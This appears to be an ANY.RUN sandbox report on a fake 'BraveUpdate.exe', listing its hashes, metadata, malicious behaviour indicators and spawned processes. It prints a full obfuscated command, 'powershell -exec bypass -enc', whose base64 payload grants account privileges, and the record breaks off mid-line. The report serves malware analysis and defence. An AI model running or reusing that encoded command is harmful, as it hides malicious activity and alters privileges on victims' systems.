File name:

BraveUpdate.exe

Full analysis: https://app.any.run/tasks/54809b42-0ab2-49f9-865d-c655cf6125a7
Verdict: Malicious activity
Analysis date: February 20, 2024, 13:28:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

A35E0E49C818D9D84C6775212DB8D6CA

SHA1:

DAD1858A24B21EDAC0CBE3E42E487FB4276182E1

SHA256:

4CF294A8CE1DD8225D0FBC810D94F6A4B1C7E6C42F0712539D6C25B9EA4F4423

SSDEEP:

49152:GiKWD0L1AoMX6I3Iff6vSY6EwT8aa/D+xF3ssoO/UUwUu5D2XecGr7+djnyOtVpy:GiKWu12X6iNz3aa/DpsReDkeD7AbZ7nz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3692)
      • powershell.exe (PID: 1696)
      • powershell.exe (PID: 2156)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 3276)
      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 1608)
      • powershell.exe (PID: 2516)
      • powershell.exe (PID: 2780)
      • powershell.exe (PID: 3336)
      • powershell.exe (PID: 1604)
      • powershell.exe (PID: 2828)
      • powershell.exe (PID: 2540)
      • powershell.exe (PID: 3568)
      • powershell.exe (PID: 392)
      • powershell.exe (PID: 2852)
      • powershell.exe (PID: 2036)
      • powershell.exe (PID: 2316)
      • powershell.exe (PID: 2960)
      • powershell.exe (PID: 3872)
      • powershell.exe (PID: 3540)
      • powershell.exe (PID: 240)
      • powershell.exe (PID: 1236)

    • Drops the executable file immediately after the start

      • BraveUpdate.exe (PID: 2472)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 3692)
      • cmd.exe (PID: 3652)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • BraveUpdate.exe (PID: 2472)

    • Executing commands from a ".bat" file

      • BraveUpdate.exe (PID: 2472)

    • Starts application with an unusual extension

      • powershell.exe (PID: 3692)
      • powershell.exe (PID: 3276)
      • powershell.exe (PID: 2156)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 1608)
      • powershell.exe (PID: 2780)
      • powershell.exe (PID: 3336)
      • powershell.exe (PID: 2828)
      • powershell.exe (PID: 1604)
      • powershell.exe (PID: 2516)
      • powershell.exe (PID: 2540)
      • powershell.exe (PID: 3568)
      • powershell.exe (PID: 3872)
      • powershell.exe (PID: 392)
      • powershell.exe (PID: 2316)
      • powershell.exe (PID: 2960)
      • powershell.exe (PID: 3540)
      • powershell.exe (PID: 1236)

    • Identifying current user with WHOAMI command

      • powershell.exe (PID: 3692)

    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 3692)
      • powershell.exe (PID: 3276)
      • powershell.exe (PID: 2156)
      • powershell.exe (PID: 2780)
      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 1608)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 2516)
      • powershell.exe (PID: 3336)
      • powershell.exe (PID: 2828)
      • powershell.exe (PID: 392)
      • powershell.exe (PID: 2540)
      • powershell.exe (PID: 3568)
      • powershell.exe (PID: 1604)
      • powershell.exe (PID: 3872)
      • powershell.exe (PID: 2316)
      • powershell.exe (PID: 2960)
      • powershell.exe (PID: 3540)
      • powershell.exe (PID: 1236)

    • Reads the Internet Settings

      • powershell.exe (PID: 3692)
      • powershell.exe (PID: 3276)
      • powershell.exe (PID: 2156)
      • powershell.exe (PID: 2780)
      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 1608)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 2516)
      • powershell.exe (PID: 3336)
      • powershell.exe (PID: 2828)
      • powershell.exe (PID: 1604)
      • powershell.exe (PID: 2540)
      • powershell.exe (PID: 3568)
      • powershell.exe (PID: 3872)
      • powershell.exe (PID: 392)
      • powershell.exe (PID: 2316)
      • powershell.exe (PID: 1236)
      • powershell.exe (PID: 3540)
      • powershell.exe (PID: 2960)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 3692)
      • cmd.exe (PID: 3652)

    • Application launched itself

      • powershell.exe (PID: 3692)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 3652)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3652)

  • INFO

    • Create files in a temporary directory

      • BraveUpdate.exe (PID: 2472)

    • Checks supported languages

      • BraveUpdate.exe (PID: 2472)
      • chcp.com (PID: 1776)
      • chcp.com (PID: 848)
      • chcp.com (PID: 1644)
      • chcp.com (PID: 2388)
      • chcp.com (PID: 3980)
      • chcp.com (PID: 1232)
      • chcp.com (PID: 1936)
      • chcp.com (PID: 3112)
      • chcp.com (PID: 3564)
      • chcp.com (PID: 2868)
      • chcp.com (PID: 2936)
      • chcp.com (PID: 3604)
      • chcp.com (PID: 3632)
      • chcp.com (PID: 3008)
      • chcp.com (PID: 3932)
      • chcp.com (PID: 2408)
      • chcp.com (PID: 1768)
      • chcp.com (PID: 3976)
      • chcp.com (PID: 1340)

    • Reads the computer name

      • BraveUpdate.exe (PID: 2472)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.dll | Win32 Dynamic Link Library (generic) (38.3)
.exe | Win32 Executable (generic) (26.2)
.exe | Win16/32 Executable Delphi generic (12)
.exe | Generic Win/DOS Executable (11.6)
.exe | DOS Executable Generic (11.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2012:11:16 22:57:03+00:00
ImageFileCharacteristics: Executable, No line numbers, No symbols, Bytes reversed lo, 32-bit, Bytes reversed hi
PEType: PE32
LinkerVersion: 2.25
CodeSize: 35840
InitializedDataSize: 115200
UninitializedDataSize: -
EntryPoint: 0x3acab0
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.3.361.147
ProductVersionNumber: 1.3.361.147
FileFlagsMask: 0x003f
FileFlags: Private build
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: BraveSoftware Inc.
FileDescription: BraveSoftware Update
FileVersion: 1.3.361.147
InternalName: BraveSoftware Update
OriginalFileName: BraveUpdate.exe
ProductName: BraveSoftware Update
ProductVersion: 1.3.361.147
PrivateBuild: -
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
86
Monitored processes
45
Malicious processes
3
Suspicious processes
18

Behavior graph

Click at the process to see the details
start braveupdate.exe no specs cmd.exe no specs powershell.exe no specs chcp.com no specs whoami.exe no specs powershell.exe powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs powershell.exe no specs powershell.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs

Process information

PID
CMD
Path
Indicators
Parent process
240powershell.exe -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgAjAGQAZQBmAGkAbgBlACAAVQBOAEkAQwBPAEQARQAKACMAZABlAGYAaQBuAGUAIABfAFUATgBJAEMATwBEAEUACgAKACMAaQBuAGMAbAB1AGQAZQAgADwAdwBpAG4AZABvAHcAcwAuAGgAPgAKACMAaQBuAGMAbAB1AGQAZQAgADwAbgB0AHMAZQBjAGEAcABpAC4AaAA+AAoAIwBpAG4AYwBsAHUAZABlACAAPABuAHQAcwB0AGEAdAB1AHMALgBoAD4ACgAjAGkAbgBjAGwAdQBkAGUAIAA8AFMAZABkAGwALgBoAD4ACgAKAHYAbwBpAGQAIABJAG4AaQB0AEwAcwBhAFMAdAByAGkAbgBnACgAUABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAEwAcwBhAFMAdAByAGkAbgBnACwAIABMAFAAVwBTAFQAUgAgAFMAdAByAGkAbgBnACkACgB7AAoAIAAgACAAIABEAFcATwBSAEQAIABTAHQAcgBpAG4AZwBMAGUAbgBnAHQAaAA7AAoACgAgACAAIAAgAGkAZgAgACgAUwB0AHIAaQBuAGcAIAA9AD0AIABOAFUATABMACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEwAcwBhAFMAdAByAGkAbgBnAC0APgBCAHUAZgBmAGUAcgAgAD0AIABOAFUATABMADsACgAgACAAIAAgACAAIAAgACAATABzAGEAUwB0AHIAaQBuAGcALQA+AEwAZQBuAGcAdABoACAAPQAgADAAOwAKACAAIAAgACAAIAAgACAAIABMAHMAYQBTAHQAcgBpAG4AZwAtAD4ATQBhAHgAaQBtAHUAbQBMAGUAbgBnAHQAaAAgAD0AIAAwADsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABTAHQAcgBpAG4AZwBMAGUAbgBnAHQAaAAgAD0AIAB3AGMAcwBsAGUAbgAoAFMAdAByAGkAbgBnACkAOwAKACAAIAAgACAATABzAGEAUwB0AHIAaQBuAGcALQA+AEIAdQBmAGYAZQByACAAPQAgAFMAdAByAGkAbgBnADsACgAgACAAIAAgAEwAcwBhAFMAdAByAGkAbgBnAC0APgBMAGUAbgBnAHQAaAAgAD0AIAAoAFUAUwBIAE8AUgBUACkAUwB0AHIAaQBuAGcATABlAG4AZwB0AGgAIAAqACAAcwBpAHoAZQBvAGYAKABXAEMASABBAFIAKQA7AAoAIAAgACAAIABMAHMAYQBTAHQAcgBpAG4AZwAtAD4ATQBhAHgAaQBtAHUAbQBMAGUAbgBnAHQAaAAgAD0AIAAoAFUAUwBIAE8AUgBUACkAKABTAHQAcgBpAG4AZwBMAGUAbgBnAHQAaAAgACsAIAAxACkAIAAqACAAcwBpAHoAZQBvAGYAKABXAEMASABBAFIAKQA7AAoAfQAKAAoATgBUAFMAVABBAFQAVQBTACAATwBwAGUAbgBQAG8AbABpAGMAeQAoAEwAUABXAFMAVABSACAAUwBlAHIAdgBlAHIATgBhAG0AZQAsACAARABXAE8AUgBEACAARABlAHMAaQByAGUAZABBAGMAYwBlAHMAcwAsACAAUABMAFMAQQBfAEgAQQBOAEQATABFACAAUABvAGwAaQBjAHkASABhAG4AZABsAGUAKQAKAHsACgAgACAAIAAgAEwAUwBBAF8ATwBCAEoARQBDAFQAXwBBAFQAVABSAEkAQgBVAFQARQBTACAATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwA7AAoAIAAgACAAIABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAFMAZQByAHYAZQByAFMAdAByAGkAbgBnADsACgAgACAAIAAgAFAATABTAEEAXwBVAE4ASQBDAE8ARABFAF8AUwBUAFIASQBOAEcAIABTAGUAcgB2AGUAcgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAWgBlAHIAbwBNAGUAbQBvAHIAeQAoACYATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAcwBpAHoAZQBvAGYAKABPAGIAagBlAGMAdABBAHQAdAByAGkAYgB1AHQAZQBzACkAKQA7AAoACgAgACAAIAAgAGkAZgAgACgAUwBlAHIAdgBlAHIATgBhAG0AZQAgACEAPQAgAE4AVQBMAEwAKQAgAHsACgAgACAAIAAgACAAIAAgACAASQBuAGkAdABMAHMAYQBTAHQAcgBpAG4AZwAoACYAUwBlAHIAdgBlAHIAUwB0AHIAaQBuAGcALAAgAFMAZQByAHYAZQByAE4AYQBtAGUAKQA7AAoAIAAgACAAIAAgACAAIAAgAFMAZQByAHYAZQByACAAPQAgACYAUwBlAHIAdgBlAHIAUwB0AHIAaQBuAGcAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgAEwAcwBhAE8AcABlAG4AUABvAGwAaQBjAHkAKAAKACAAIAAgACAAIAAgACAAIABTAGUAcgB2AGUAcgAsAAoAIAAgACAAIAAgACAAIAAgACYATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAAoAIAAgACAAIAAgACAAIAAgAEQAZQBzAGkAcgBlAGQAQQBjAGMAZQBzAHMALAAKACAAIAAgACAAIAAgACAAIABQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAKACAAIAAgACAAKQA7AAoAfQAKAAoATgBUAFMAVABBAFQAVQBTACAAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUATwBuAEEAYwBjAG8AdQBuAHQAKABMAFMAQQBfAEgAQQBOAEQATABFACAAUABvAGwAaQBjAHkASABhAG4AZABsAGUALAAgAFAAUwBJAEQAIABBAGMAYwBvAHUAbgB0AFMAaQBkACwAIABMAFAAVwBTAFQAUgAgAFAAcgBpAHYAaQBsAGUAZwBlAE4AYQBtAGUALAAgAEIATwBPAEwAIABiAEUAbgBhAGIAbABlACkACgB7AAoAIAAgACAAIABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnADsACgAKACAAIAAgACAASQBuAGkAdABMAHMAYQBTAHQAcgBpAG4AZwAoACYAUAByAGkAdgBpAGwAZQBnAGUAUwB0AHIAaQBuAGcALAAgAFAAcgBpAHYAaQBsAGUAZwBlAE4AYQBtAGUAKQA7AAoACgAgACAAIAAgAGkAZgAgACgAYgBFAG4AYQBiAGwAZQApACAAewAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAEwAcwBhAEEAZABkAEEAYwBjAG8AdQBuAHQAUgBpAGcAaAB0AHMAKAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFAAbwBsAGkAYwB5AEgAYQBuAGQAbABlACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABBAGMAYwBvAHUAbgB0AFMAaQBkACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAmAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAxAAoAIAAgACAAIAAgACAAIAAgACkAOwAKACAAIAAgACAAfQAKACAAIAAgACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIABMAHMAYQBSAGUAbQBvAHYAZQBBAGMAYwBvAHUAbgB0AFIAaQBnAGgAdABzACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAsAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBjAGMAbwB1AG4AdABTAGkAZAAsAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARgBBAEwAUwBFACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAmAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAxAAoAIAAgACAAIAAgACAAIAAgACkAOwAKACAAIAAgACAAfQAKAH0ACgAKAHYAbwBpAGQAIABtAGEAaQBuACgAKQAKAHsACgAgACAAIAAgAEgAQQBOAEQATABFACAAaABUAG8AawBlAG4AIAA9ACAATgBVAEwATAA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACgARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAsACAAVABPAEsARQBOAF8AUQBVAEUAUgBZACwAIAAmAGgAVABvAGsAZQBuACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACAAZgBhAGkAbABlAGQALgAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACAAcgBlAHQAdQByAG4AZQBkADoAIAAlAGQAXABuACIALAAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQApADsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAtADEAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABEAFcATwBSAEQAIABkAHcAQgB1AGYAZgBlAHIAUwBpAHoAZQAgAD0AIAAwADsACgAKACAAIAAgACAAaQBmACAAKAAhAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AKABoAFQAbwBrAGUAbgAsACAAVABvAGsAZQBuAFUAcwBlAHIALAAgAE4AVQBMAEwALAAgADAALAAgACYAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQAgACYAJgAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQAgACEAPQAgAEUAUgBSAE8AUgBfAEkATgBTAFUARgBGAEkAQwBJAEUATgBUAF8AQgBVAEYARgBFAFIAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAFAAVABPAEsARQBOAF8AVQBTAEUAUgAgAHAAVABvAGsAZQBuAFUAcwBlAHIAIAA9ACAAKABQAFQATwBLAEUATgBfAFUAUwBFAFIAKQAgAG0AYQBsAGwAbwBjACgAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBHAGUAdABUAG8AawBlAG4ASQBuAGYAbwByAG0AYQB0AGkAbwBuACgACgAgACAAIAAgACAAIAAgACAAaABUAG8AawBlAG4ALAAKACAAIAAgACAAIAAgACAAIABUAG8AawBlAG4AVQBzAGUAcgAsAAoAIAAgACAAIAAgACAAIAAgAHAAVABvAGsAZQBuAFUAcwBlAHIALAAKACAAIAAgACAAIAAgACAAIABkAHcAQgB1AGYAZgBlAHIAUwBpAHoAZQAsAAoAIAAgACAAIAAgACAAIAAgACYAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAEwAUABXAFMAVABSACAAcwB0AHIAcwBpAGQAOwAKACAAIAAgACAAQwBvAG4AdgBlAHIAdABTAGkAZABUAG8AUwB0AHIAaQBuAGcAUwBpAGQAKABwAFQAbwBrAGUAbgBVAHMAZQByAC0APgBVAHMAZQByAC4AUwBpAGQALAAgACYAcwB0AHIAcwBpAGQAKQA7AAoAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBVAHMAZQByACAAUwBJAEQAOgAgACUAUwBcAG4AIgAsACAAcwB0AHIAcwBpAGQAKQA7AAoACgAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAaABUAG8AawBlAG4AIAA9ACAATgBVAEwATAA7AAoACgAgACAAIAAgAE4AVABTAFQAQQBUAFUAUwAgAHMAdABhAHQAdQBzADsACgAgACAAIAAgAEwAUwBBAF8ASABBAE4ARABMAEUAIABwAG8AbABpAGMAeQBIAGEAbgBkAGwAZQA7AAoACgAgACAAIAAgAGkAZgAgACgAcwB0AGEAdAB1AHMAIAA9ACAATwBwAGUAbgBQAG8AbABpAGMAeQAoAE4AVQBMAEwALAAgAFAATwBMAEkAQwBZAF8AQwBSAEUAQQBUAEUAXwBBAEMAQwBPAFUATgBUACAAfAAgAFAATwBMAEkAQwBZAF8ATABPAE8ASwBVAFAAXwBOAEEATQBFFMALAAgACYAcABvAGwAaQBjAHkASABhAG4AZABsAGUAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAE8AcABlAG4AUABvAGwAaQBjAHkAIAAlAGQAIgAsACAAcwB0AGEAdAB1AHMAKQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAGkAZgAgACgAcwB0AGEAdAB1AHMAIAA9ACAAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUATwBuAEEAYwBjAG8AdQBuAHQAKABwAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAsACAAcABUAG8AawBlAG4AVQBzAGUAcgAtAD4AVQBzAGUAcgAuAFMAaQBkACwAIABTAEUAXwBMAE8AQwBLAF8ATQBFAE0ATwBSAFkAXwBOAEEATQBFACwAIABUAFIAVQBFACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBPAHAAZQBuAFAAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUATwBuAEEAYwBjAG8AdQBuAHQAbwBsAGkAYwB5ACAAJQBkACIALAAgAHMAdABhAHQAdQBzACkAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAgACAAIAAgAFQATwBLAEUATgBfAFAAUgBJAFYASQBMAEUARwBFAFMAIAB0AHAAOwAKAAoAIAAgACAAIABpAGYAIAAoACEATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAoAEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALAAgAFQATwBLAEUATgBfAFEAVQBFAFIAWQAgAHwAIABUAE8ASwBFAE4AXwBBAEQASgBVAFMAVABfAFAAUgBJAFYASQBMAEUARwBFAFMALAAgACYAaABUAG8AawBlAG4AKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAE8AcABlAG4AUAByAG8AYwBlAHMAcwBUAG8AawBlAG4AIAAjADIAIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAHQAcAAuAFAAcgBpAHYAaQBsAGUAZwBlAEMAbwB1AG4AdAAgAD0AIAAxADsACgAgACAAIAAgAHQAcAAuAFAAcgBpAHYAaQBsAGUAZwBlAHMAWwAwAF0ALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgAFMARQBfAFAAUgBJAFYASQBMAEUARwBFAF8ARQBOAEEAQgBMAEUARAA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBMAG8AbwBrAHUAcABQAHIAaQB2AGkAbABlAGcAZQBWAGEAbAB1AGUAKABOAFUATABMACwAIABTAEUAXwBMAE8AQwBLAF8ATQBFAE0ATwBSAFkAXwBOAEEATQBFACwAIAAmAHQAcAAuAFAAcgBpAHYAaQBsAGUAZwBlAHMAWwAwAF0ALgBMAHUAaQBkACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBMAG8AbwBrAHUAcABQAHIAaQB2AGkAbABlAGcAZQBWAGEAbAB1AGUAIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAEIATwBPAEwAIAByAGUAcwB1AGwAdAAgAD0AIABBAGQAagB1AHMAdABUAG8AawBlAG4AUAByAGkAdgBpAGwAZQBnAGUAcwAoAGgAVABvAGsAZQBuACwAIABGAEEATABTAEUALAAgACYAdABwACwAIAAwACwAIAAoAFAAVABPAEsARQBOAF8AUABSAEkAVgBJAEwARQBHAEUAUwApAE4AVQBMAEwALAAgADAAKQA7AAoAIAAgACAAIABEAFcATwBSAEQAIABlAHIAcgBvAHIAIAA9ACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApADsACgAKACAAIAAgACAAaQBmACAAKAAhAHIAZQBzAHUAbAB0ACAAfAB8ACAAKABlAHIAcgBvAHIAIAAhAD0AIABFAFIAUgBPAFIAXwBTAFUAQwBDAEUAUwBTACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBBAGQAagB1AHMAdABUAG8AawBlAG4AUAByAGkAdgBpAGwAZQBnAGUAcwAgAGYAYQBpAGwAZQBkAC4AIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAgAHIAZQB0AHUAcgBuAGUAZAA6ACAAJQBkAFwAbgAiACwAIABlAHIAcgBvAHIAKQA7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAALQAxADsACgAgACAAIAAgAH0ACgAKACAAIAAgACAAQwBsAG8AcwBlAEgAYQBuAGQAbABlACgAaABUAG8AawBlAG4AKQA7AAoAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAUwBJAFoARQBfAFQAIABwAGEAZwBlAFMAaQB6AGUAIAA9ACAARwBlAHQATABhAHIAZwBlAFAAYQBnAGUATQBpAG4AaQBtAHUAbQAoACkAOwAKAAoAIAAgACAAIABjAGgAYQByACAAKgBsAGEAcgBnAGUAQgB1AGYAZgBlAHIAIAA9ACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABOAFUATABMACwAIABwAGEAZwBlAFMAaQB6AGUAIAAqACAATgBfAFAAQQBHAEUAUwBfAFQATwBfAEEATABMAE8AQwAsACAATQBFAE0AXwBSAEUAUwBFAFIAVgBFACAAfAAgAE0ARQBNAF8AQwBPAE0ATQBJAFQAIAB8ACAATQBFAE0AXwBMAEEAUgBHAEUAXwBQAEEARwBFAFMALAAgAFAAQQBHAEUAXwBSAEUAQQBEAFcAUgBJAFQARQApADsACgAgACAAIAAgAGkAZgAgACgAbABhAHIAZwBlAEIAdQBmAGYAZQByACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAYQBwAHAAbABvAGcAKABMAE8ARwBfAEkATgBGAE8ALAAgACIAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAIABmAGEAaQBsAGUAZAAsACAAZQByAHIAbwByACAAMAB4ACUAeAAiACwAIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAoACkAKQA7AAoAIAAgACAAIAB9AAoAfQA=C:\Windows\System32\WindowsPowerShel